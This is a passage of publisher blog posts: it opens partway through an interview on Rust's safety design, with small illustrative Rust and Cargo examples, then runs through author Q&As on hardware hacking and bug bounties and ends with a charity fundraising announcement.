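// Rust has no null: a possibly-missing value is an Option, and there is
// no way to "just use" it without first deciding what None means here.

fn greeting(names: &[&str], idx: usize) -> String {
    match names.get(idx) {
        Some(name) => format!("hello, {name}"),
        None => String::from("no such user"), // the compiler forces this arm
    }
}

fn main() {
    let names = ["alice", "bob"];
    println!("{}", greeting(&names, 0)); // in-bounds lookup succeeds
    println!("{}", greeting(&names, 5)); // out-of-bounds case was handled up front
}
```

In a dynamic language the out-of-bounds case would typically surface as a runtime exception in production; here the decision was forced before the program ever compiled.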

It’s that change to the development process that causes much of (though not all of) Rust’s steeper learning curve. And it’s a very real and non-trivial lesson to learn. I also suspect it’ll be a hugely valuable lesson going forward, with the industry’s increased focus on guaranteed correctness through things like formal verification, which only pushes the developer experience further in this direction. Not to mention that the lessons you pick up often translate back into other languages. When I now write code in Java, for instance, I am much more cognizant of the correctness and performance implications of that code because Rust has, in a sense, taught me how to reason better about those aspects of code.
 

NSP: In the initial 2015 release announcement, Rust creator Graydon Hoare called it “technology from the past come to save the future from itself.” More recently, Rust evangelist Carol Nichols described it as “trying to learn from the mistakes of C, and move the industry forward.” To give everyone some context for these sentiments, tell us what sets Rust apart safety-wise from “past” systems languages – in particular, C and C++ – when it comes to things like memory and ownership.

JG: I think Rust provides two main benefits over C and C++ in particular: ergonomics and safety. For ergonomics, Rust adopted a number of mechanisms traditionally associated with higher-level languages that make it easier to write concise, flexible, (mostly) easy-to-read, and hard-to-misuse code and interfaces – mechanisms like algebraic data types, pattern matching, fairly powerful generics, and first-class functions. These in turn make writing Rust feel less like what often comes to mind when we think about system programming – low-level code dealing just with raw pointers and bytes – and makes the language more approachable to more developers.

As for safety, Rust encodes more information about the semantics of code, access, and data in the type system, which allows it to be checked for correctness at compile time. Properties like thread safety and exclusive mutability are enforced at the type level in Rust, and the compiler simply won’t let you get them wrong. Rust’s strong type system also allows APIs to be designed to be misuse-resistant through typestate programming, which is very hard to pull off in less strict languages like C.
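As a hedged sketch of typestate programming (these types are invented for illustration, not from any real crate), each protocol state gets its own type, so an out-of-order call simply doesn't typecheck:

```rust
// A connection that can only send after authenticating. The "state machine"
// lives in the type system: send() does not exist on Unauthenticated, so
// calling it before login() is a compile error, not a runtime surprise.

struct Unauthenticated;

struct Authenticated {
    user: String,
}

impl Unauthenticated {
    // login() consumes the old state and returns the new one, so the
    // unauthenticated handle can't be reused afterward either.
    fn login(self, user: &str) -> Authenticated {
        Authenticated { user: user.to_string() }
    }
}

impl Authenticated {
    fn send(&self, msg: &str) -> String {
        format!("{} -> {}", self.user, msg)
    }
}

fn main() {
    let conn = Unauthenticated;
    let conn = conn.login("alice");
    println!("{}", conn.send("hi"));
    // Unauthenticated.send("hi") would not compile: no such method.
}
```

The misuse-resistance comes from ownership: because `login()` takes `self` by value, the compiler also prevents holding on to the pre-login handle.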

Rust’s choice to have an explicit break-the-glass mechanism in the form of the unsafe keyword also makes a big difference, because it allows the majority of the language to be guaranteed-safe while also allowing low-level bits to stay within the same language. This avoids the trap of, say, performance-sensitive Python programs where you have to drop to C for low-level bits, meaning you now need to be an expert in two programming languages! Not to mention that unsafe code serves as a natural audit trail for security reviews!
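A contrived but minimal illustration of that break-the-glass pattern (safe `split_at` would do this particular job; the point is the shape): the `unsafe` block is confined inside a safe function whose logic upholds the invariant, leaving a small, greppable audit point.

```rust
// The unsafe surface is one expression; everything callers touch is safe.

fn sum_halves(data: &[u32]) -> (u32, u32) {
    let mid = data.len() / 2;
    // SAFETY: mid <= data.len(), so both ranges are in bounds.
    let (a, b) = unsafe { (data.get_unchecked(..mid), data.get_unchecked(mid..)) };
    (a.iter().sum(), b.iter().sum())
}

fn main() {
    println!("{:?}", sum_halves(&[1, 2, 3, 4]));
}
```

A security review can `grep unsafe` and audit just these few lines plus their SAFETY comment, rather than the whole codebase.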
 

NSP: Along those same lines, Rust (like Go and Java) prevents programmers from introducing a variety of memory bugs into their code. This got the attention of the Internet Security Research Group, whose latest project, Prossimo, is endeavoring to replace basic internet programs written in C with memory-safe versions in Rust. Microsoft has also been very vocal about their adoption of Rust, and Google is backing a project bringing Rust to the Linux kernel underlying Android. As Rust is increasingly embraced and used for bigger and bigger projects, are there any niche or large-scale applications, or certain technology combos you’re most excited about?

JG: Putting aside the discussion about whether Rust prevents the same kinds of bugs in the same kinds of ways as languages like Go and Java, it’s definitely true that the move to these languages represents a significant boost to memory safety. And I think Rust in particular unlocked another segment of applications that would previously have been hard to port, such as those that would struggle to operate with a language runtime or automated garbage collection.

For me, some of the most exciting trajectories for Rust lie in its interoperability with other systems and languages, such as making Rust run on the web platform through WASM, providing a better performance fallback for dynamic languages like Ruby or Python, and allowing component-by-component rewrites in established existing systems like cURL, Firefox, and Tor. The potential for adoption of Rust in the kernel is also very much up there if it might make kernel development more approachable than it currently is – kernel C programming can be very scary indeed, which means fewer contributors dare try.
 

NSP: In the book’s foreword, David Tolnay – a prolific contributor to the language, who served as your technical reviewer – says that he wants readers to “be free to think that we got something wrong in this book; that the best current guidance in here is missing something, and that you can accomplish something over the next couple years that is better than what anybody else has envisioned. That’s how Rust and its ecosystem have gotten to this point.” The community-driven development process he’s referencing is somewhat unique to Rust and its evolution. Could you briefly explain how that works?

JG: I’m very happy that David included that in his foreword, because it resonates strongly with me coming from a background in academia. The way we make progress is by constantly seeking to find new and better solutions, and questioning preconceived notions of what is and isn’t possible, or how things “should” be done. And I think that’s part of how Rust has managed to address as many pain points as it does. The well-known Rust adage of “fast, reliable, productive, pick three” is, in some sense, an embodiment of this sentiment – let’s not accept the traditional wisdom that this is a fundamental trade-off, and instead put in a lot of work and see if there’s a better way.

In terms of how it works in practice, my take is that you should always seek to understand why things are the way they are. Why is this API structured this way? Why doesn’t this type implement Send? Why is 'static required here? Why does the standard library not include random number generation? Often you’ll find that there is a solid and perhaps fundamental underlying reason, but other times you may just end up with more questions. You might find an argument that seems squishy and soft, and as you start poking at it you realize that maybe it isn’t true anymore. Maybe the technology has improved. Maybe new algorithms have been developed. Maybe it was based on a faulty assumption to begin with. Whatever it may be, the idea is to keep pulling at those threads in the hope that at the other end lies some insight that allows you to make something better.

The end result could be an objectively better replacement for some hallmark crate in the ecosystem, an easing of restrictions in the type system, or a change to the recommended way to write code – all of which move the needle along towards a better Rust. That sentiment's best summarized by David Tolnay’s self-quote from 2016: “This language seems neat but it's too bad all the worthwhile libraries are already being built by somebody else.”
 

NSP: Alumni of the Rust Core team have said that it’s a systems language designed for the next 40 years – quite an appealing hook for businesses and organizations that want their fundamental code base to be usable well into the future. What are some of the key design decisions that have made Rust, in effect, built to last?

JG: Rust takes backwards compatibility across versions of the compiler very seriously, and the intent is that (correct) code that compiled with an older version of the compiler should continue to compile indefinitely. To ensure this, larger changes to the language are tested by re-building all versions of all crates published to crates.io to check that there are no regressions. Of course, the flip side of backwards compatibility is that it can be difficult to make improvements to the language, especially around default behavior.

The Rust project’s idea to bridge this divide is the “edition” system. At its core, the idea is to periodically cut new Rust editions that crates can opt into to take advantage of the latest non-backwards-compatible improvements, but with the promise that crates using different editions can co-exist and interoperate, and that old editions will continue to be supported indefinitely. This necessarily limits what changes can be made through editions, but so far it has proven to be a good balance between “don’t break old stuff” and “enable development of new stuff” that is so vital to a language’s long-term health.
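As a concrete sketch of the opt-in Jon describes (the crate name and version here are hypothetical), a crate declares its edition in its Cargo.toml manifest, and each dependency is compiled under whatever edition that dependency itself declares:

```toml
# Cargo.toml -- a hypothetical crate opting into the 2021 edition.
# Dependencies written against older editions (2015, 2018) still
# build and interoperate; editions apply per crate, not per program.
[package]
name = "my-crate"
version = "0.1.0"
edition = "2021"
```

The toolchain also ships automated migration support (`cargo fix --edition`) to ease moving an existing crate forward to a newer edition.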

The Rust community’s commitment to semantic versioning also underpins some of Rust’s long-term stability promises – that is, by allowing crates to declare through their version number when they make breaking changes, Rust can ensure that even as dependencies change, their dependents will continue to build long into the future (though potentially losing out on improvements and bug fixes as old versions stop being maintained).
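For instance (with a hypothetical crate name and version), Cargo’s default “caret” requirement interprets a dependency’s version bound semver-compatibly, which is what lets old dependents keep building as new compatible releases appear:

```toml
# Cargo.toml dependency section -- hypothetical crate and version.
# "1.4.2" is a caret requirement: Cargo may select any version
# >= 1.4.2 and < 2.0.0, on the promise that 1.x releases are
# API-compatible. A 2.0.0 release signals a breaking change and
# is never selected by this requirement.
[dependencies]
some-crate = "1.4.2"
```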
 

NSP: One of the goals listed on the Rust 2018 roadmap was to develop teaching resources for intermediate Rustaceans, which I believe is what spurred you to start streaming your live-coding sessions on YouTube. Developers have really embraced them as a way of learning how to use Rust “for real.” Why is it useful, in your view, for newcomers to see an experienced Rust programmer go through the whole development process and see real systems implemented in real time?

JG: Learning a language on your own is a daunting task that requires self-motivation and perseverance. You need to find a problem you’re interested in solving; you need to find the will to get through the initial learning curve where you’ll get stuck more often than you’ll make meaningful progress; and you have to accept the inevitable rabbit holes that you’ll go down when it turns out things don’t work the way you thought they did. That’s not an insurmountable challenge, and some people really enjoy the journey, but it is also time-consuming, humbling and, at times, quite frustrating. Especially because it can feel like you’re infinitely far from what you really wanted to build.

Watching experienced developers build something, especially if you’re watching live and can ask questions, provides a shortcut of sorts. You get to be directly exposed to good development and debugging processes; you get exposure to language mechanisms and tools that you may otherwise not have found for a while on your own; and you spend less time stuck searching for answers, since the experienced developer can probably explain why something doesn’t work shortly after discovering the problem. Of course, it’s not a complete replacement. You don’t get as much of a say in what problem is being worked on, which means you may not be as invested in it, and you won’t get the same exposure to teaching resources that you may later need as you’re trying to work things out on your own. Ultimately, I think of it as a worthwhile “experience booster” to supplement a healthy and steady diet of writing code yourself.
 

NSP: The popularity of your videos notwithstanding, you’ve said that part of what inspired you to write the book is that “they’re not for everyone,” and that some people – yourself included – have a different learning style. Given that both mediums cover advanced topics (pinning, async, variance, and so on), would you say the book is an alternative to the live coding sessions, or is it designed to complement them? In other words, would a developer who’s watched your videos still benefit from the book (and vice versa)?

JG: It’s a bit of a mix. The “Crust of Rust” videos cover topics that are covered in the book, and the book covers topics from my videos, but often in fairly different ways. I think it’s likely that consuming both leads to a deeper understanding than consuming either in isolation. But I also think that consuming either of them should be enough to at least give you the working knowledge you need to start playing with a given Rust feature yourself.

For readers of the book, I would actually recommend watching one of the longer live-coding streams on my channel (over the Crust of Rust videos), because they cover a lot of ground that’s hard to capture in a book. Topics like how to think about an error message or how to navigate Rust documentation work best when demonstrated in practice. And who knows – you may even find the problem area interesting enough that you watch the whole thing to the end!

And with that… std::process::exit
 

Break It Till You Make It: Q&A with Hardware Hackers Colin O'Flynn and Jasper van Woudenberg


To kick off the Cybersecurity Awareness Month edition of our ongoing Author Spotlight series, we’re joined by Colin O’Flynn and Jasper van Woudenberg, co-authors of The Hardware Hacking Handbook (available November 2021). In the following Q&A, we talk with Colin (@colinoflynn) and Jasper (@jzvw) about the perils of proprietary protocols being replaced with network devices, the problem of having too many interesting targets to test your tools on, the beauty of AI-designed attack systems, the indisputable power of “hammock hacking,” and why nobody cares about fault injection until they get hacked with fault injection.

Cover of The Hardware Hacking Handbook, by Colin O'Flynn and Jasper van Woudenberg

Colin runs NewAE Technology, Inc., a startup based on his ChipWhisperer project that designs tools to make hardware attacks more accessible, and teaches engineers about embedded security – a topic he frequently speaks about at conferences and on tech podcasts.

Jasper is CTO of Riscure North America, where he leads the company’s pentesting teams, and has a special interest in integrating AI with security. His research has been published in various academic journals, and he’s a regular speaker at educational and hacking conferences.

No Starch Press: I’ll start by saying that your book is timely! Hardware hacking, once a niche field of the exploit world, has become far more relevant amidst the proliferation of embedded devices all around us. What do you think accounts for this, and why are side-channel attacks in particular becoming increasingly common (and difficult to prevent)?

Colin O'Flynn: Hardware hacking has been a niche field, but one with an extensive and long history. Most of the powerful attacks we’re discussing today have been demonstrated for 20 years, so I’d say they should be “well-known.” But the truth seems to be that, until recently, advanced hardware attacks weren’t needed for most IoT devices. Default passwords and unlocked debug interfaces were the norm, so most hardware hackers never needed to dig deeper. Many people I’ve talked to at events have told me they were interested in side-channel and similar advanced attacks but never had time to actually learn them, as they were always able to break devices with easier and faster attacks!

The good news is that device manufacturers seem to be taking security more seriously these days, which means side-channel attacks have become a real threat. So I guess we’re seeing the industry fast-forwarding that 20-year lag of security research to catch up.

Jasper van Woudenberg: Hacking always moves with interesting targets. Once pinball machines started requiring money to play, people “hacked” them by just tilting the whole machine. Nowadays physical pinball machines have a tilt sensor – if you tilt the machine in order to affect the ball, it ceases operation. Of course, we’re talking about digital hardware in our book, but bypassing security systems is as old as security systems. So, the abundance of digital devices naturally increases the amount of hacking going on. Side-channel attacks are fascinating if you’re into the intersection between electronics, signal processing and cryptography. Beyond being fascinating though, they only become relevant when more straightforward attacks are mitigated.

NSP: Fault injection (FI) attacks – which inject a glitch into a target device that alters its behavior so you can bypass security mechanisms – used to be too “high end” for most hackers to bother with, often requiring expensive tools and intimate technical knowledge of the specific system under attack. But those days are over. Not only are low-cost FI toolkits readily available, the explosion of IoT has led to the rise of new defensive features, like Secure Boot, that can be easily subverted by a well-timed FI attack. What are the potential risks to a larger IoT network once a device is compromised this way?

CO: In the past we’ve seen end devices used as a pivot point into a more sensitive network. When it comes to commercial devices, we’re seeing many proprietary protocols replaced with network devices. For example, recent access-control readers are now simply PoE devices that talk back to a central server. With many of these devices, the original designers haven’t considered what happens if an end node becomes compromised. While the network may be correctly secured, you still see sensitive credentials stored in end devices become accessible to an attacker. And if an attacker is able to access these credentials, it means they may be able to pivot off the external network and into more sensitive internal networks.

JVW: I think the cost of the tools is a common misunderstanding – they can be really inexpensive. In our lab, we’ve done attacks literally by soldering a single wire to a bus and connecting it to a button; when we pressed the button at the right time, the system booted our own code. The cost usually comes from the many days and weeks spent trying to figure out how to carry out the attack. And yes, some attacks do require high-end equipment, or at least equipment that can bring down the time needed to figure out the attack.

One common stepping-stone attack we see is the firmware dump. Typically, embedded-device firmware does not receive a lot of scrutiny, and may have lingering vulnerabilities that can be exploited. This usually means gaining control over a single device, but there have been wormable firmware issues in the past.

NSP: What measures can be taken to harden embedded systems against FI attacks, and do you see this happening throughout the industry (why or why not)?

JVW: We always advise our customers to threat model and see if it makes sense to consider FI in scope. Usually that’s the case for embedded systems that are out in the field and have some sensitive assets to protect. Next is the question of whether faults can be mitigated in hardware and/or software. Doing both is ideal, but that’s not always feasible. Our book contains a chapter on countermeasures that also has a lab, so people can try out some ideas for FI countermeasures. Finally, verifying countermeasures early and often is critical. It’s virtually impossible, as a human, to predict all the ways a system can fault. Pre-silicon fault simulation and post-silicon fault injection turn up surprises without exception. Iteration and adaptation are key.

And then the million-dollar question: why is this hardening not happening throughout the industry? It’s a combination of cost and human nature. There is a real engineering cost to these countermeasures, so typically the only customers we see requiring FI resistance are those whose devices have already been compromised. If a compromise hasn’t happened, it’s very easy to write the attacks off as unrealistic or irrelevant. Nobody cares about fault injection until they get hacked with fault injection.

CO: Fault injection can be tricky to prevent, as we see countermeasures applied that aren’t effective. For instance, Jasper and I demonstrate a few examples in the book where compilers might remove the effect of your clever countermeasures. There seems to be a lot more interest in this now – many companies just need some “end customer” to ask about it. I talked to silicon vendors a few years ago who were tracking countermeasure ideas, but basically none of their customers (the people who actually build products) cared about FI attacks, which meant the vendors weren’t going to pay for the engineering effort to add those countermeasures. We seem to be seeing a very fast shift in the last couple of years though, so people who were tracking this early on are in a good position to quickly offer solutions.

NSP: Speaking of low-cost fault-injection toolkits, Colin, you developed one of the most popular models out there, the ChipWhisperer, and built a company around it (NewAE Technology). Given that just about everything we use in our homes and offices has embedded computing systems and could be vulnerable to attack, how do you pick which devices to test your boards and analysis algorithms on? An example from your book would be smart toothbrushes – are you ever doing something like brushing your teeth when it suddenly occurs to you, “Wow, I could totally hack this thing”?

CO: This is actually a big problem! Unfortunately I tend to buy a lot of devices (microcontrollers, IoT products, industrial control systems, etc.) because I think they will be interesting to poke at! As a result, I’ve got a storage cabinet full of various devices along these lines… I’m slowly working through some of them, and when we get some time at the company, we’ll pick away at one or two of those devices as well.

But as more devices include embedded security, there are more “interesting” targets than there is any hope of finding time to deal with them. Part of why we design many different target-board devices (our “UFO targets” for ChipWhisperer) is actually to help out other researchers by giving them an easier platform to work with.

NSP: Once you successfully exploit a commonly used product, do you let the manufacturer know or is that generally considered an exercise in futility?

CO: If I plan on talking about an issue publicly I’ll reach out, even if I don’t think it’s a serious issue. Sometimes it takes a bit of time to reach the correct person (or team), but so far those conversations have all generally turned into positive experiences all around.

With one ongoing disclosure, for example, the engineering team had internally flagged that there could be some issues related to a relatively insecure microcontroller that they were using in a product, and my report validated their internal concerns. In this case they were already working on a new design, but I’m sure my report was a nice bonus for the people involved, as they can point to it as proof that the issue would eventually be found “in the wild.” In the meantime it gave them the opportunity to provide an interim fix via a firmware update for existing customers.

NSP: Jasper, one of your specialized areas of interest is combining AI with security research. Would you explain what this entails? And looking into the future, how could AI applications be leveraged to improve hardware and embedded security at the design level?

JVW: What I love about AI is also what I love about hacking: making a computer device do more than the original designer put in. With AI, this is tying a couple of artificial neurons together and getting a cat-and-dog image detector. With hacking, this is sending some weird input into a program and all of a sudden it executes arbitrary code.

I find the combination fascinating. For instance, we’ve used neural networks to do side-channel analysis and outperform human-designed algorithms. With colleagues, we created an algorithm that automatically optimizes fault injection parameters. I’ll work very hard to create some automation so I can be – paradoxically – lazy afterwards.

I firmly believe that most if not all cognitive activities, such as designing or attacking systems, will be better performed using AI rather than brains – the big question is when. I prefer to be on the side of making systems more secure through AI, so my research is going towards automating both the detection and mitigation of vulnerabilities, at scale. For instance, a big push we have currently is in pre-silicon security – detecting side-channel and fault issues before they make it into products. I wouldn’t say we’ve arrived at using AI yet, but the first steps are being made.

NSP: Both of you have advanced degrees, which makes sense given all of the academic knowledge involved with embedded security. Yet, The Hardware Hacking Handbook makes very little assumption about a reader’s background. What was your approach to making this challenging field accessible to novices and newcomers, and why was it important enough that you wrote an entire book on this premise?

CO: On paper, my career path seems relatively full of academic love – I was an assistant professor for several years in the Electrical & Computer Engineering department at Dalhousie University. But back at the start, when I was considering applying for my undergraduate degree in electrical engineering, I came relatively close to not attending university at all. I had taught myself a fair amount about electronics in high school, and managed to get a summer job that was effectively an electrical engineering internship, and I was considering just continuing to grow with the “on the job” experience instead. In the end I fell onto the academic path, but I’ve always believed that it is not the only path, and that experience shapes my desire to make this field as accessible as possible.

While many readers may be undergraduate or grad students, it’s clear that a classic academic textbook would cut out readers coming from other backgrounds (everyone from high school students to professionals interested in exploring other careers). Practically, what we write down isn’t the only consideration – one of the great things about working with No Starch Press is that the pricing of the books makes them more accessible as well. From an academic publisher, this book would have been $150+. And there would never be Humble Bundle sales that make it completely accessible on the level that NSP does!

JVW: I’ve taught courses on side-channel and fault injection for years, and it has taught me that the group of people that has to defend against these attacks is not necessarily interested in all the theory and all the research in this field. They want to focus on their goals of creating a system.

Then there’s the group of people like teenage me. I started hacking software before I had an internet connection, so I know the struggle of having to figure out everything by yourself. Looking around at the amazing blogs, videos, tutorials, etc. that currently exist for the software space, I realized what a gap there is in the hardware space.

So, for both of these groups, it’s really about breaking things down into practical tips and tricks, plus some of the unavoidable theoretical background. I really want to show people that this space isn’t daunting, and that even someone like me – who comes from a software background – can learn and enjoy it.

NSP: I’ll end with an easy one (I think) – what is your favorite hacking tool, and has that changed since you first got interested in hardware hacking when you were young?

CO: I should probably say my favourite tool is one of my own more-advanced products. But really, a good DMM is the most important tool! And in that regard, it hasn’t changed much over the years – one of my first “dream gifts” (back when Santa would be responsible for it) was a Fluke 12 multimeter, long before I knew about hardware hacking. I’ve since upgraded to a nicer meter (Fluke 179/EDA2 kit), but as we talk about in the book, there is so much you can do with this tool! Finding where pins go, checking the state of logic levels and voltages – it’s still my most used tool when I’m looking at a new device.

JVW: I started being “creative with technology” in the mid-’90s. What has changed is the amount of information available, and the fact that security is now an actual career – I still don’t always believe people are willing to pay me to do this. What hasn’t changed is my curiosity, and the rush that comes with solving a complex problem.

Favorite hacking tool? Hah. Although I use devices for a significant portion of the day, they are also a source of frustration. So, those are out. I’m going to say: my hammock. When I get stuck on a problem and I sense no more new ideas are being produced, or I get frustrated, I drop the problem for a few hours or days. Then I hop in my hammock for what I call “hammock hacking.” This is where I hang back and relax. I’ll almost always have a new view on the problem, or another way of connecting some dots that I hadn’t considered before. Or I fall asleep. But it’s a win in either case.

InfoSec Warrior Vickie Li: From Hunting Bugs to Helping Developers

Vickie Li is the resident developer evangelist at the application security firm ShiftLeft, and a self-described “professional investigator of nerdy stuff.” Her new book, Bug Bounty Bootcamp, leverages her expertise in offensive web security as well as her background in vulnerability research to introduce beginners to all aspects of web hacking, showing readers how to find, exploit, and report bugs through “bounty” programs. In her free time, when she’s not podcasting, speaking at conferences, or dropping infosec and cybersecurity knowledge on YouTube, she’s writing articles and blog posts about nipping security problems in the bug.

Cover of Bug Bounty Bootcamp, by Vickie Li

For the September edition of our ongoing Author Spotlight series, we talk with Vickie about her first bug bounty payout, how her success hacking apps made her a passionate advocate for secure development, and why she means it quite literally when she tells you that becoming a good web hacker is like learning to ride a unicycle.

No Starch Press: First of all, that’s a pretty impressive intro for someone in their mid-twenties! But let’s go back a few years. You graduated with a CS degree from Northwestern, then worked as a freelance web developer before getting into infosec, pentesting, and offensive-security content creation, which – correct me if I’m wrong – led to your current full-time gig as a developer evangelist. So where did your foray into bug hunting come into play, and how did you get started with bounty programs?

Vickie Li: I got interested in security through my university courses, and started bug bounties as a way to learn more about infosec. Hacking on bug bounty programs helped me learn a lot about web hacking and web application security in general. But sitting in front of my laptop all day, I started to lose motivation because I really wanted my work to connect me with other people, and doing bug bounties all alone was quite lonely. That’s why I started my technical blog, where I wrote about whatever I was learning at the moment. I really tried to make the blog posts easy to understand, because I hoped people who were studying the same thing would find it helpful.

My blog actually kickstarted my career in infosec. Because of it, I was able to get some freelance penetration testing and technical writing jobs, and eventually landed my current job at ShiftLeft. Knowing how to explain complex technical concepts also helped me with writing Bug Bounty Bootcamp and making it an approachable web-hacking book.

NSP: What was your first real catch, and what was it like earning your first paid bounty?

VL: I found my first paid bug – a CSRF – about a week into hunting for bugs. The bounty was just a hundred dollars, but it was amazing to be able to earn a bit of money as I learned about the field. The most memorable part of the experience was when [the company’s] security team triaged the bug I found and fixed it on the website. It was very motivating to know that I could contribute to the security of a widely used site through my work!

NSP: Over the past year you’ve gone from working as a freelancer/bug hunter to a full-time gig as a “developer evangelist” – a job focused on bridging communications between external dev teams and your internal app-security colleagues. Can you elaborate on what exactly your day-to-day is like, and how it satisfies your infosec interests?

VL: My primary role at ShiftLeft involves making secure coding practices approachable for developers, and spreading the word about how static analysis can help in this process. Every day is different: I might be writing a blog post, preparing to speak at a conference, or helping my team understand the needs of developers during the security process. I really enjoy the work because it fits into my original motivation for getting into infosec: helping make the internet a safer place for everyone.

NSP: The name of your company refers to shifting security to the left – or, introducing security checks earlier in the development life cycle rather than at the end. You underscored this in a blog post, comparing app security to wearing a facemask during the pandemic (“Building a Security-First Culture”). At the same time, your book is about hunting for zero-day vulnerabilities and getting started in bounty programs. Do you ever worry that if you’re too good at your job there won’t be any more bugs to hunt?

VL: I am not worried about that. Shifting left and bug bounties are not an either-or situation. These practices work together to help organizations become more secure. Bug bounty hunters are creative and are constantly coming up with new ways to attack an application. Organizations can use bug bounty programs to tackle new and inventive attack vectors before malicious attackers discover them. But most bugs should still be discovered early in the development cycle, when they are the easiest to fix. Shifting left will help eliminate most security vulnerabilities in your applications, and bug bounties can help you catch the rest.

NSP: To take this question in the opposite direction, has your bug-hunting experience helped or informed your current work advocating for better security practices?

VL: During my time as a bug bounty hunter, I helped lots of developer teams fix security issues in their applications. That’s when I noticed that many serious security vulnerabilities stem from small programming mistakes that could be easily discovered with static analysis. It’s easier to find and fix vulnerabilities early in the development process, because you don’t risk an attacker exploiting them in production.

This experience made me a really passionate advocate for secure development and security education. Offensive security practices like penetration testing or bug bounties are a great way to secure your applications, but they should only be used as a fail-safe to catch novel bug classes and vulnerabilities that slip past security protocols during the development cycle.

NSP: The AppSec space, and the cybersecurity industry as a whole, lives in a constant state of change, with new types of exploits emerging every day. How do you keep up with the ever-evolving landscape?

VL: I’m known to be quiet on social media, but I actually use Twitter a lot – mostly to get informed on the latest security news and understand the security challenges people are currently facing. In other words, I am the classic Twitter lurker. I also read a lot of infosec books, and follow a few well-written security blogs and YouTube channels.

NSP: Are there any online resources (besides your own) that you can recommend to aspiring web hackers, bug hunters, or security researchers?

VL: I am a big fan of reading security books to gain in-depth knowledge about a topic, and then reading blog posts for the latest infosec techniques – Orange Tsai’s blog is one of my favorites. He is a really creative hacker and has been a big inspiration for me ever since I started. Also, Web Security Academy by PortSwigger is a great starting point for web hackers who want to get some hands-on experience.

NSP: Okay, I’ve saved the most pressing question for last. You recently posted on Twitter that you were having a hard time selling your unicycle. This implies that 1) you own a unicycle, and 2) that you know how to ride a unicycle. Do tell.

VL: Happy to announce that I have sold my unicycle to a new loving owner! I learned to unicycle in college because I’ve always thought it’s cool to have an uncommon skill like unicycling. Unicycling is really hard to learn! It took me countless falls and months of practice to finally learn to ride it in a straight line.

But, this experience really boosted my confidence in learning. Like web hacking, learning to unicycle is hard but possible if you put your mind to it and persist. Now when I am trying to learn something difficult, I know I can ‘cause hey – I learned to unicycle! 10/10 would recommend unicycling as a sport. There are few things in this world cooler than a unicycling hacker.

With Your Help, We Raised Over $2.75M for Charity!

 

We’ve been partnering with our authors and Humble Bundle on special pay-what-you-want ebook deals since 2015—that’s 30 bundles to date, for those keeping score at home. As anyone who’s taken advantage of these promotions knows, the PWYW model means that you choose between various pricing tiers of titles, then decide how much of your purchase goes to charity.

This is all to say: THANK YOU. We’re fortunate to have such a generous customer base, because over the last eight years we’ve raised more than $2.75 million for two-dozen non-profits, as well as the Hacker Alliance—a 501(c)(3) created by publisher Bill Pollock to support hacker communities around the world.

From promoting digital rights and fighting censorship, to helping marginalized populations learn to code, to supporting education through the United Negro College Fund and Teach for America, we’ve done a lot of good together.

Here’s the full list of nonprofits that your charitable donations have gone towards:

  • Electronic Frontier Foundation
  • The No Starch Press Foundation 
  • Python Software Foundation 
  • Choose-Your-Own-Charity 
  • National Coalition Against Censorship 
  • Freedom of the Press Foundation 
  • Code.org 
  • Internet Security Research Group
  • Freedom to Read Foundation 
  • Book Industry Charitable Foundation
  • Girls Who Code 
  • Comic Book Legal Defense Fund
  • Covenant House
  • United Negro College Fund
  • Teach For America
  • Code-to-Learn Foundation 
  • Women Who Code, Inc. 
  • Extra Life 
  • Active Minds, Inc. 
  • Every Child a Reader
  • St. Jude Children's Research Hospital 
  • Call of Duty Endowment 
  • The Red Nose Day Fund / Comic Relief, Inc.
  • It Gets Better Project 

 

 

About Humble Bundle 

Humble Bundle sells digital content through its pay-what-you-want bundle promotions and the Humble Store. When purchasing a bundle, customers choose how much they want to pay and decide where their money goes—between the content creators, charity, and Humble Bundle. Since the company's launch in 2010, Humble Bundle has raised more than $140 million through the support of its community for a wide range of charities, providing aid for people across the world. For more information, visit https://www.humblebundle.com/charities